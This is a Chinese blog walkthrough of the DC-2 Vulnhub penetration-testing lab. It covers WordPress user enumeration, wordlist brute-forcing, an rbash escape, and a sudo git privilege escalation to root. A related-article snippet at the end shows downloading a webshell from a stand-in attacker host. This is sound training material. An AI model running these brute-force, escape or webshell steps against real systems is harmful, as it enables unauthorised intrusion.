DC-2靶场实验过程

最新推荐文章于 2024-09-30 17:19:22 发布
最新推荐文章于 2024-09-30 17:19:22 发布
阅读量832 收藏 28
点赞数 9
文章标签: 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84694887/article/details/142593728
版权

一、环境搭建:

与DC-1非常相似,DC-2是另一个专门建立的易受攻击的实验室,目的是获得渗透测试领域的经验。与最初的DC-1一样,它是为初学者设计的。必须具备Linux技能并熟悉Linux命令行,还必须具有使用基本渗透测试工具的经验。就像DC-1一样,有五面旗帜,包括最后一面旗帜。和DC-1一样,旗子对初学者来说很重要,但对有经验的人来说就不那么重要了。简而言之,唯一真正有意义的旗帜,是最后一面旗帜。对于初学者来说,谷歌是你的朋友。好吧,除了所有的隐私问题等等。我没有探索实现root的所有方法,因为我放弃了我一直在研究的上一个版本,并从基本操作系统安装中完全重新开始。

和DC-1一样,有五个flag

2、下载靶场环境

    靶场下载地址:

https://www.vulnhub.com/entry/dc-2,311/

二、渗透靶场

1、目标:

    目标就是我们搭建的靶场,靶场IP为:XXX.XXX.XXX.XXX/24

2、信息收集:寻找靶机真实IP

命令:nmap -sP 192.168.136.130/24

3、信息收集:探端口及服务

命令:nmap -A -p- -v 192.168.136.130

4、访问web站点

http:// 192.168.136.130

访问不了,且发现我们输入的ip地址自动转化为了域名,我们想到dc-2这个域名解析失败,我们需要更改hosts文件,添加一个ip域名指向。

修改hosts文件,添加靶机IP到域名dc-2的指向

命令:vim /etc/hosts

添加之后,重新访问就能访问成功了

点击flag,进入之后,发现是flag1

大致意思就是暴力破解,账号密码

5、做一个目录扫描

dirb http://dc-2/

发现后台地址

打开后进入到登录页面

http://dc-2/wp-admin/user/

6、用户名枚举

Wpscan一些常用语句:

wpscan --url http://dc-2

wpscan --url http://dc-2 --enumerate t 扫描主题

wpscan --url http://dc-2 --enumerate p 扫描插件

wpscan --url http://dc-2 --enumerate u 枚举用户

扫描wordpress版本

命令:wpscan --url http://dc-2

发现wordpress的版本4.7.10

登录页面尝试登录
随即输入用户名密码,提示用户名不存在,似乎可以进行用户名枚举

 首先来个用户枚举,再尝试利用枚举到的用户爆破密码

命令:wpscan --url http://dc-2 --enumerate u

 枚举出三个用户名

admin jerry tom

7、暴力破解出账号和密码

命令:cewl http://dc-2/ -w dict.txt   

cat dc2.txt

使用wpscan进行暴力破解

命令:wpscan --url http://dc-2 --passwords dc2.txt

 爆破出来两个账号 

jerry/adipiscing 

tom/parturient

使用jerry/adipiscing登录此站点

tom/parturient登陆此站点

8、发现flag2

登录后台之后,我们看到flag2

点进去之后看到flag2提示信息,简单说就是如果wordpress行不通的话就会一个点,我们之前发现有ssh,我们看看ssh

9、在tom的家目录发现flag3

jerry/adipiscing

tom/parturient

   登录ssh

ssh tom@192.168.136.130  -p 7744

查看可以使用的命令

命令:echo $PATH


cd进不去目录 使用ls直接查看目录信息

使用echo来绕过rbash

BASH_CMDS[a]=/bin/sh;a

export PATH=$PATH:/bin/

export PATH=$PATH:/usr/bin

echo /*

10、发现flag4

大致意思就是还没有结束。猜想需要提权才能获取到最终的flag,并且flag4 提示我们可以使用git,我们可以通过git来提权

  使用tom用户无权限运行sudo 我们切换到jerry用户

    我们可以看到无需root权限,jerry 可以使用 git

Sudo -l 

11、提权

查看一下可以使用的root权限命令

命令:find / -user root -perm -4000 -print 2>/dev/null

jerry用户也不可以直接sudo su

使用git命令进行提取

命令:sudo git help status

输入!/bin/sh

提权成功

12、发现final-flag.txt

cd /root

cat final-flag.txt

到这一步也就结束了

小呆呆瓜瓜
关注
DC-1靶场渗透实验
Alashan12的博客
05-05 1971
一、环境准备 Kali虚拟机 DC-1靶场http://www.five86.com/downloads/DC-1.zip 首先将kali虚拟机和靶机DC1都设置为net模式 ifconfig查看kali的IP为192.168.152.128 使用nmap扫描此网段下的主机 启动DC-1靶机 再次扫描得到DC-1靶机的IP地址为192.168.152.138 二、实验过程 使用nmap针对该IP进行详细扫描 发现打开了22、80和111的端口,还开启了s...
DC-3靶场渗透】
一纸荒芜的博客
12-12 3584
DC3靶场打靶记录!
DC-5靶场实战
qq_42754807的博客
03-28 837
DC-5靶场实战
DC-5靶场下载及渗透实战详细过程DC靶场系列)
金 帛的博客
07-30 2876
dc-5靶场详细渗透过程
2024kali上打DC-1靶场
2301_80110280的博客
07-16 751
Current Setting是目前设置的内容 Required表示是否需要设置内容,yes为必须设置,no可以设置也可不设置 就上面来说RHOSTS需要set,但是没有内容 所以接着我们来设置一下RHOSTS内容(就是攻击目标IP地址,靶场地址)
DC-1靶场实验过程
2401_84694887的博客
09-25 905
它是为初学者设计的挑战,但它到底有多容易取决于你的技能和知识,以及你的学习能力。要成功完成这一挑战,您需要掌握Linux技能,熟悉Linux命令行,并具有基本渗透测试工具的经验,例如可以在Kali Linux或Parrot Security OS上找到的工具。查看www目录下文件,发现flag1.txt文件,打开发现提示信息,内容提示寻找站点的配置文件。发现是一个电信的drupal服务,根据nmap结果可知当前运行的是Drupal 7的CMS。登陆战点之后,随便翻一番,发现flag3,
DC-1靶场实验报告
jiaxingjia123的博客
09-25 752
DC-1靶场实验报告
DC-4靶场搭建及渗透实战详细过程DC靶场系列)
金 帛的博客
07-28 5331
dc-4靶场详细渗透过程
DC-2靶场
2401_84693704的博客
09-27 1107
Cd jerryLs。
DC系列漏洞靶场-渗透测试学习复现(DC-2)
W983079520的博客
11-03 1861
DC-2是一个易受攻击的实验环境,最终目的是让攻击者获得root权限,并读取flag。 本篇文档中用到了vi提权和git提权。 1 环境搭建 下载靶场文件,使用Vbox或者VM打开即可;攻击机使用kali-2020。 2 主机发现 使用Kali中的arp-scan工具扫描结果如下: 172.16.12.145为DC-2靶机的IP地址。 3 端口探测 探测使用nmap工具 端口扫描结果如下: 由扫描结果知开放端口有两个: 80(http默认端口)和运行着SSH服务的7744端口。
DC系列漏洞靶场-渗透测试学习复现(DC-1)
W983079520的博客
11-01 2779
最近闲着冲浪玩发现了DC系列漏洞靶场(下载了8个靶场DC-1到DC-8),从信息收集到最后拿到超级管理员权限,可以说几乎贯穿了渗透测试的每一步,寻找一个个flag,通过flag中的指引内容,帮助我们拿到最后的root身份,过程还是挺有趣的! DC系列靶机下载地址:https://download.vulnhub.com/dc/DC-6.zip(DC后的数字可以换成1-8中任意一个) DC-1是一个易受攻击的实验环境,最终目的是让攻击者获得root权限,并读取flag。 DC-1提权关键词:find
DC系列漏洞靶场-渗透测试学习复现(DC-7)
W983079520的博客
12-10 1827
DC-7是一个易受攻击的实验环境,最终目的是让攻击者获得root权限,并读取flag。 本篇文档中用到了exim4漏洞提权和shell二次反弹。 1 环境搭建 下载靶场文件,使用Vbox或者VM打开即可;攻击机使用kali-2020。 2 主机发现 使用Kali中的arp-scan工具扫描结果如下: 172.16.12.149为DC-7靶机的IP地址。 3 端口探测 探测使用nmap工具 端口扫描结果如下: 由扫描结果知开放端口有两个:22(SSH服务默认端口)和80(http默
Vulnhub靶机:DC-1渗透详细过程
IerkeU的博客
01-27 2804
这次练习的是vulnhub平台下的DC系列靶机第一台,下载地址为https://www.vulnhub.com/entry/dc-1,292。该靶机的难度系数为简单,其中有五个flag,我们在练习的过程中可以直接跳过其中以部分flag中的提示直接拿到root权限。
MySQL之复合查询与内外连接
zdlynj的博客
09-30 498
前面我们讲解的mysql表的查询都是对一张表进行查询,即数据的查询都是在某一时刻对一个表进行操作的。而在实际开发中,我们往往还需要对多个表同时进行查询。我们这里使用的测试表,为雇员信息表(来自Oracle 9i的经典测试表):EMP员工表,DEPT部门表,SALGRADE工资等级表。
JPA+Thymeleaf增删改查
y050505的博客
09-25 495
在使用JPA(Java Persistence API)和Thymeleaf作为模板引擎进行Web开发时,实现增删改查(CRUD)操作是一个常见的需求。下面,我将简要介绍如何使用Spring Boot框架结合JPA和Thymeleaf来实现这一功能。
k8s搭建一主三从的mysql8集群---无坑
oopxiajun博客专栏
09-27 893
对于构建基于MySQL的大规模、高性能应用来讲,需要使用水平扩展(集群)的数据库架构方式。在MySQL内建的复制功能可以实现,通过为服务器配置一个或多个备库的方式来进行数据同步。同时复制功能不仅有利于构建高性能的应用,也是高可用性、可扩展性、容灾、备份以及数据仓库等工作的基础。复制的基本原理是让一台服务器的数据与其他服务器保持同步。一台主库的数据可以同步到多台备库上,备库本身也可以被配置成另外一台服务器的主库。主库和备库之间可以有多种不同的组合方式。
[EBPF] 实时捕获DM数据库是否存在SQL阻塞
飞奔的屎壳郎
09-27 879
名称版本linux版本(centos8.5)DM88.1.4.27python利用ebpf技术在不登录数据库的情况下,通过对数据库的函数添加钩子,实时的对数据库是否存在阻塞判断现有的监控逻辑都是新建数据库用户执行SQL语句来判断阻塞情况,告警的实时性取决于监控的周期频率,而使用ebpf技术能够解决这个痛点ebpf有多种实现方式,这里便于理解测试的话 使用python语言内置c语言的形式进行了说明。涉及到生产环境应该是使用go语言或者c语言去做能够有效避免源码泄露等问题。
Redis事务
最新发布
zhzjn的博客
09-30 238
Redis事务可以通过MULTI、EXEC、WATCH和DISCARD指令来实现。1. MULTI指令:表示事务的开始,之后的所有指令都会被逐一记录,但不会立即执行。2. EXEC指令:表示事务的执行,会按照记录的指令逐一执行。3. WATCH指令:可以监视一个或多个键的变化,如果在事务执行期间被其他客户端修改,事务会被回滚。4. DISCARD指令:表示事务的撤销,可以放弃之前记录的指令。
DC-5靶场渗透过程中,怎样挂载木马文件
06-02
DC-5 靶场渗透过程中,如果要挂载木马文件,可以按照以下步骤进行操作: 1. 找到可写入的目录:可以使用 `ls -al` 命令查看目录权限,找到可写入的目录。通常会有一些临时目录或者上传目录是可写入的。 2. 上传木马文件:将自己准备好的木马文件上传到可写入的目录中。可以使用 `curl` 或者 `wget` 命令进行上传,例如: ``` curl -o shell.php http://attacker.com/shell.php ``` 上述命令会将 `shell.php` 文件下载到本地,并保存到当前目录下。 3. 运行木马文件:在浏览器中访问上传的木马文件,例如 `http://dc5/wordpress/wp-content/plugins/akismet/views/akismet.php`。如果一切正常,就可以获得一个远程 shell,并在目标系统中执行任意命令了。 需要注意的是,这种做法是违法的,仅用于学习和研究目的,切勿在未授权的情况下对他人的系统进行攻击。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值